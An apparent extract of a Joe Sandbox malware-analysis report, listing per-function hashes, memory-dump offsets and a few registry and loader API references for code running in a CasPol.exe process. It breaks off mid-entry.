Snapshot File: hcaresult_6_2_20700000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: baf74f49680f934e9a66c174e27b8731da8941935af6969dd7059605e4907f49
Instruction ID: a667f38a560ec43fa79eb85850312440482087f5662598f9ab8ded96e0452637
Opcode Fuzzy Hash: baf74f49680f934e9a66c174e27b8731da8941935af6969dd7059605e4907f49
Instruction Fuzzy Hash: 4651B275B442059BCB04EBF4C884AAEB7F6BF88314B158A39D5129B251EF70E908C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 2063E2C1 Relevance: 1.6, APIs: 1, Instructions: 116
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 2063E3D9

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: fa077a516344f1222296254e40e79585cfd6a6597b32ad60e7e4b4591fd79123
Instruction ID: 30cab6d6af4db885f079ea3c74d0b2b2ff5441c24122676f6348e4e429df6d3f
Opcode Fuzzy Hash: fa077a516344f1222296254e40e79585cfd6a6597b32ad60e7e4b4591fd79123
Instruction Fuzzy Hash: 834133B0E042599FDB10CFE9C884ACEBBF5EF48704F15856AE918AB391D7749805CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 2063E009 Relevance: 1.6, APIs: 1, Instructions: 111
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 2063E11C

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f5a099f290e8addc2f08f6da5560967bdd404b52ee8ed47110100dbce7982078
Instruction ID: 1ee49d5214f6517d3e2ba856dcc662767e65799b39e5f6f7aa3ea925c5dd2953
Opcode Fuzzy Hash: f5a099f290e8addc2f08f6da5560967bdd404b52ee8ed47110100dbce7982078
Instruction Fuzzy Hash: 7B4148B0D053898FDB14CFE8C588A8EFFF1AF58304F19856AD508AB346C7B59945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 2063E320 Relevance: 1.6, APIs: 1, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 2063E3D9

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e407f0958582a1ec48f980c4ed1ee93d001c5604a465ffa8f1526a528bba5840
Instruction ID: dc4e21e6f4bac31a457a08f971ec35f7c06eae78acc0219407380634c1fc33d8
Opcode Fuzzy Hash: e407f0958582a1ec48f980c4ed1ee93d001c5604a465ffa8f1526a528bba5840
Instruction Fuzzy Hash: 3D31DDB1D002589FCB10CFEAC984ADEBBF5BF48700F15806AE818AB354D774A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 2063E068 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 2063E11C

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b90cc2ac53f594383a8a289be319ab84f322cd0383f890bfadb81792652763bf
Instruction ID: 7627f75d5687acad5cda2ab2a52e7b52a24c487290a739590c6101fc19395f06
Opcode Fuzzy Hash: b90cc2ac53f594383a8a289be319ab84f322cd0383f890bfadb81792652763bf
Instruction Fuzzy Hash: 5D31FFB0D002499FDB10CFD9C584A8EFFF5BF48304F25856AE808AB245C7B59985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 2063E98D Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 2063E9D1

Memory Dump Source

Source File: 00000006.00000002.9118217387.0000000020630000.00000040.00000800.00020000.00000000.sdmp, Offset: 20630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20630000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12caaa8f2a2268fb19888b5ac9f12934005e0f7c7fbccc28346b053ba1c7d7ae
Instruction ID: b408157a75ecb184f233344615cc6b4d143b8e3b7c72eaa437434817127464bf
Opcode Fuzzy Hash: 12caaa8f2a2268fb19888b5ac9f12934005e0f7c7fbccc28346b053ba1c7d7ae
Instruction Fuzzy Hash: D7114C74D04218DFCB05DFB4D988B9EBBB1FF48305F108428D412AB295CB35A849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A9887 Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

\VXl, xrefs: 1D2A9B47

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID: \VXl
API String ID: 0-4274571051
Opcode ID: cdd0998b9adc1454f1088aaf43eac2b6f946ae1eb6fb1283b5c3164483bb424c
Instruction ID: ff34e33343a832ff742854af6e84da30ba7649a0e7a7c933b3c324fb3bad56ad
Opcode Fuzzy Hash: cdd0998b9adc1454f1088aaf43eac2b6f946ae1eb6fb1283b5c3164483bb424c
Instruction Fuzzy Hash: 0FB17174F4421A8FDB00CFAAC88179EBBF1FF88704F64852AD425A7654EB749845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE6AD0 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcefff3807809dc819d3a8ded64fdad1214a4bf50c034c18cfc8760ef63f4690
Instruction ID: 506c9e2916de43df021fbcb8142ee7feeff39a5bf7de9b96283a2924b10eab86
Opcode Fuzzy Hash: dcefff3807809dc819d3a8ded64fdad1214a4bf50c034c18cfc8760ef63f4690
Instruction Fuzzy Hash: 62D14B76A593504BCB008E54D0612EEFEE2BFC4227FA15128C9048BF96DF35EC4D9BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AE430 Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c8f85b54b89dcd35664c63361bf3f524abcc96b576f700eb72e769014ef1465
Instruction ID: 4a4c46c9515c295aba54682844226f4e1baab301721699efa1c81b21fd7e7c58
Opcode Fuzzy Hash: 0c8f85b54b89dcd35664c63361bf3f524abcc96b576f700eb72e769014ef1465
Instruction Fuzzy Hash: 59326378A002248FDB15EB70CD987ADB7B6BF88315F4041EAD80AA7344DF725E958F61

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AE440 Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f48d3a155d28369adc5a944d36752f27f41ee64523d07025c14b4eb7a7b4f8d
Instruction ID: d68ffe4a2344504f985ecb89b16a75735b9b0eece96b67445286a927235d183b
Opcode Fuzzy Hash: 7f48d3a155d28369adc5a944d36752f27f41ee64523d07025c14b4eb7a7b4f8d
Instruction Fuzzy Hash: 53326478A002248FDB15EB70CD987ADB7B6BF88315F4041EAD80AA7344DF725E958F61

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEDA00 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c626a2be6ef5348b0b0602c338c40c05c35720ad521ec70c8263f9299da53fc4
Instruction ID: 2fe006860f9abe3033ee682cf3ca33c6ec6370bc0ddddb14383d8c7654e0b8a9
Opcode Fuzzy Hash: c626a2be6ef5348b0b0602c338c40c05c35720ad521ec70c8263f9299da53fc4
Instruction Fuzzy Hash: F6E1E435B082258FCB009B78C898B6D7BF2EFC8321F158226E516DB695DF359D09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AED78 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6a3c896f90331190298571f094136bea937d98023b0386a9b69de57a1ee5a2
Instruction ID: feea58ef69a80aeabe22cb73b4bda78ea8bfef336a44cf535e4a4395470d0c28
Opcode Fuzzy Hash: ea6a3c896f90331190298571f094136bea937d98023b0386a9b69de57a1ee5a2
Instruction Fuzzy Hash: C402C938955328CFCB65DFB0C88868AB772FF49315F5081E9D41AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AED99 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e820411bcf87a30ceec05df3a6f20b13bc422bb3c8ccf057d619d8ff9c844604
Instruction ID: 0973063f6b17e561bda36376d4f9de420e03389b9a635acc5c0c02a7f1e817df
Opcode Fuzzy Hash: e820411bcf87a30ceec05df3a6f20b13bc422bb3c8ccf057d619d8ff9c844604
Instruction Fuzzy Hash: 0102D938955328CFCB65DFB0C88868AB772FF49315F5081E9D41AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEDD5 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0050611ac7b4cee9c7fe32272b17a54717fb24801045df1affa4e5c52d28396
Instruction ID: 9edfa915c86d5fd94ff3fbdbc5ef4e8e85a704b7dd4cd65b8d041acd7a3585b1
Opcode Fuzzy Hash: d0050611ac7b4cee9c7fe32272b17a54717fb24801045df1affa4e5c52d28396
Instruction Fuzzy Hash: E202D938955328CFCB65DFB0C88868AB772FF49315F5081E9D41AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A45F0 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f65383e0fc37c0d6e89ce820a146a1d390ba1a1d7df52acce5b9790797401580
Instruction ID: ea1460427658acc144baf268f204fc5dcfd31f26d41da50586b0b51aaebaaf85
Opcode Fuzzy Hash: f65383e0fc37c0d6e89ce820a146a1d390ba1a1d7df52acce5b9790797401580
Instruction Fuzzy Hash: 4FC1E1307042169FCB04DF64C894AAE7BA6FF88314F158429E91ADB790CF31EC56CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEE1A Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0776c4bacabffb31c48eb7fd369f594cdb043234ad4ed9b8fed82239f9f406f3
Instruction ID: 1ad8d01f1b6fd3a90e87944a7389baac0701d5d04e43eb7698a1c88e89e9f0e0
Opcode Fuzzy Hash: 0776c4bacabffb31c48eb7fd369f594cdb043234ad4ed9b8fed82239f9f406f3
Instruction Fuzzy Hash: 6902D938955328CFCB65DFB0C88868AB771FF49315F5081E9D41AA2794CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEE5F Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6fbe2439173055d56a73a50a2d9c936b7ba540a7549bc3d1fe6569c3ec9ce1
Instruction ID: eda9150366deb77342c12c612efb4b852f1a3cf4cba004c841054e725a88f7ed
Opcode Fuzzy Hash: ae6fbe2439173055d56a73a50a2d9c936b7ba540a7549bc3d1fe6569c3ec9ce1
Instruction Fuzzy Hash: 5F02D938955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEEA4 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2fe3bd4f791bc8bc68f1c67ef3fa334522f3b404cc1de0cc7c43831aa4ffbf9
Instruction ID: 1fd0019e18794d063e2d43bb1f064aec8c9b7790a4df0e823f0ca2bb357493da
Opcode Fuzzy Hash: a2fe3bd4f791bc8bc68f1c67ef3fa334522f3b404cc1de0cc7c43831aa4ffbf9
Instruction Fuzzy Hash: 00F1D938955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE60A8 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a2cceadc2be3f0abd97d761db2c5378fd975fb1320d2958ab43b7a6ae9a94cf
Instruction ID: 78a57090d6aae133db9ca957454b471aa4c7628cdff21cec04a6f0995553c4ce
Opcode Fuzzy Hash: 7a2cceadc2be3f0abd97d761db2c5378fd975fb1320d2958ab43b7a6ae9a94cf
Instruction Fuzzy Hash: 47D109B6A20614CFCB04CF69C58499DBBF2BF99314B1681A9E415EB362DB31FC41EB50

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEEE9 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785da891170747f18cc847143725a06df24d0832796dce03cf320bb346c0d978
Instruction ID: 538dd1c53bebfc3cb6de42abd7b1ea3ecf2e54e405bfbc2de6255fb5db7602ac
Opcode Fuzzy Hash: 785da891170747f18cc847143725a06df24d0832796dce03cf320bb346c0d978
Instruction Fuzzy Hash: E3F1D838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE5F88 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf77ff1ce9adcd053af2cfe9e79c5e748dfde759e9b137a4543b210e2a737e63
Instruction ID: e4a3104fdf54c2a3317581712079ac7b979d26421a912fe215cebc399f5e600c
Opcode Fuzzy Hash: cf77ff1ce9adcd053af2cfe9e79c5e748dfde759e9b137a4543b210e2a737e63
Instruction Fuzzy Hash: B7D10AB1E206148FCB00CFA8C98499EBBF2FF99314B168199E515AB362D731FC41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEF2E Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9598deacf777896ec1b38c05d384625cbbbce6b9838ee9963a03ac34e4b94ad0
Instruction ID: c8f06cd55ee104134945e47106e9513c8468462280db424cb3e795676277e13c
Opcode Fuzzy Hash: 9598deacf777896ec1b38c05d384625cbbbce6b9838ee9963a03ac34e4b94ad0
Instruction Fuzzy Hash: 54F1D838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEF73 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ded71ad82c0ea69f8022af4af44b3df5553448740fb9958bf4da813fafac3ae
Instruction ID: c6338ba4eb5779c8b069adca01b1da0a9dedc18975ce1e153f148ad76834760d
Opcode Fuzzy Hash: 6ded71ad82c0ea69f8022af4af44b3df5553448740fb9958bf4da813fafac3ae
Instruction Fuzzy Hash: E4F1D838955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEFB8 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f3a605de4a015b158ec406febc5108db9a8c807f78640806788e1f6503ea03
Instruction ID: c794f6b71366a836efe74ff2abd10c51351f4908b52cd292c81bc3b27e5ccede
Opcode Fuzzy Hash: b6f3a605de4a015b158ec406febc5108db9a8c807f78640806788e1f6503ea03
Instruction Fuzzy Hash: A4E1C938955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AEFFD Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93e94a54032f6fa99a4a30c07789b297797e8eeb1f30d9adcc2d9759d238701
Instruction ID: 9de50872d8403d1733f34bd140b7cc4608d75fa0b7e42b64d4340971a9feb79f
Opcode Fuzzy Hash: b93e94a54032f6fa99a4a30c07789b297797e8eeb1f30d9adcc2d9759d238701
Instruction Fuzzy Hash: 58E1B938955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2794DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF042 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3522f19501aa7b55e5cdeedc1b4e880b7b0448eb0a4e73f73de40bd22982eb7f
Instruction ID: bafb2b4272251f6851e6b08796d7d7f6397af0f2bfe9b7d82ae80e26a664e541
Opcode Fuzzy Hash: 3522f19501aa7b55e5cdeedc1b4e880b7b0448eb0a4e73f73de40bd22982eb7f
Instruction Fuzzy Hash: E3E1C938955328CFCB65DFB0C88868AB771FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF087 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae305a06cec923019e11b4f1a40fe5638d2f7d8020efe9ccf9c87bffc124a9d8
Instruction ID: 10ca1f86fa336d2136407c2be6bd66dbe5408b5b331bfa4eda08afd9acabf1ab
Opcode Fuzzy Hash: ae305a06cec923019e11b4f1a40fe5638d2f7d8020efe9ccf9c87bffc124a9d8
Instruction Fuzzy Hash: E2E1C838955328CFCB65DFB0C88868AB772FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF0CC Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92bc455fb43d376f615cab8455c4e28ea8060e6867df176fa7e6a2f9d2632e99
Instruction ID: fd5ec2bc7b2ba706f4d850cb9cade93a2a24b16357607b63741737a5a15a5d52
Opcode Fuzzy Hash: 92bc455fb43d376f615cab8455c4e28ea8060e6867df176fa7e6a2f9d2632e99
Instruction Fuzzy Hash: FED1D938955328CFCB65DFB0C88868AB772FF49315F5081E9D40AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AA157 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ccd5c93d566e340728b26fb8e94fafff56ab3e2e2825337bb3b153ed3ce2eb
Instruction ID: f16911d7f5a5b3b4850e6567b020d96439431fe19286ec214a653b8ae624e6f9
Opcode Fuzzy Hash: 41ccd5c93d566e340728b26fb8e94fafff56ab3e2e2825337bb3b153ed3ce2eb
Instruction Fuzzy Hash: E1A16E70E4421ACFDB00CFA9D8857EEBBF1FF48314F248529E425A7654EB759885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF108 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbf1a468736dde85a33d4c3db46d7512de35fa16b551e593391ae06f87782d91
Instruction ID: 4253d34a97debca4c8151b5e26a3bf04a0b09404c4873a07d6b272d64dcc7dd3
Opcode Fuzzy Hash: cbf1a468736dde85a33d4c3db46d7512de35fa16b551e593391ae06f87782d91
Instruction Fuzzy Hash: 2FD1C838955328CFCB65DFB0C88868AB772FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF14D Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3889ae7032f5f39acac76bea0cec9e1d2c6c9fea6c33568c6e668188e7b9d2e8
Instruction ID: b57780615bebf9ee2c8f6dc177ccfa970dbd7063fb2e62b50da0d0dec4e9e919
Opcode Fuzzy Hash: 3889ae7032f5f39acac76bea0cec9e1d2c6c9fea6c33568c6e668188e7b9d2e8
Instruction Fuzzy Hash: DCD1D938955328CFCB65DFB0C888A8AB771FF49315F5081E9D40AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF192 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 376c597cc52b5a0afd1bea967a7f7756018959355534603e1265dab16378b114
Instruction ID: 570e31034e5434eb8c96854141bab3481bfefd5a25836cba726c442c7974442a
Opcode Fuzzy Hash: 376c597cc52b5a0afd1bea967a7f7756018959355534603e1265dab16378b114
Instruction Fuzzy Hash: 12C1C838955328CFCB65DFB0C88868AB772FF49315F5081E9D40AA2754DB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE66B0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f77f1cd33a5d2064142a4a41347584d26d12c8b2bd867f98457ac270dcab592
Instruction ID: 74f1a32e10c3d813836d230c7a252c03bfdbaecae9f5c20a63e87760f179ff6f
Opcode Fuzzy Hash: 1f77f1cd33a5d2064142a4a41347584d26d12c8b2bd867f98457ac270dcab592
Instruction Fuzzy Hash: 1B91B0B6A242558FCB10CF68C894A9EBFB1FF44310F0680A9E8559B263D731FC44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF1D7 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090d792db7bd2a5f424a92fae8945be710e8f7c2e5ccd3a536f93f495977f38c
Instruction ID: 3987ca19e2cbd3a8df7b87e2eecbc770117e69e8f9ed5ded94d3a83744d90a80
Opcode Fuzzy Hash: 090d792db7bd2a5f424a92fae8945be710e8f7c2e5ccd3a536f93f495977f38c
Instruction Fuzzy Hash: A4C1D938955328CFCB65DFB0C88868AB772FF49315F5081E9D40AA2754CB369E81CF92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF213 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

